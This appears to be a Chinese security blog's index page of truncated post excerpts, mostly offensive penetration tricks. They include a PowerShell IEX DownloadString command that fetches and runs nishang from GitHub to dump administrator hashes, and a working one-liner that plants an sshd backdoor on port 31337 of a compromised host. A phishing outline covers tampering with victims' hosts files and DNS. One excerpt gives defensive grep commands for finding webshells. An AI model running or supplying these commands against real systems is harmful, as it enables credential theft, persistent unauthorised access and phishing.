in 工具收集

powerpreter 下载: PS F:\powerpreter> (new-object System.Net.WebClient).DownloadFile("https://raw.githubusercontent.com/samratashok/nishang/ma...

in 安全运维

在网站目录差找如下关键字: grep -Rn "shell_exec *(" /var/www grep -Rn "base64_decode *(" /var/www grep -Rn "phpinfo *(" /var/www g...

in 渗透案例奇技淫巧

1.入侵得到SHELL后,对方防火墙没限制,想快速开放一个可以访问的SSH端口 肉鸡上执行 ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337; 就会派生一个31337端口,然后连接31337,用root/bin/ftp/mail当用户名...

in 渗透案例奇技淫巧

0x00常见网络钓鱼方式 攻击者进行网络钓鱼的方式常有以下几种: 1、通过修改受害者hosts文件(C:\WINDOWS\system32\drivers\etc\hosts)来实现; 2、通过修改受害者dns来实现; 3、已经进入路由器,直接修改路由器的DNS。 罗列的并不全,之后遇到...

in 奇技淫巧

使用powershell远程调用来抓取管理hash。 在线导hash powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/...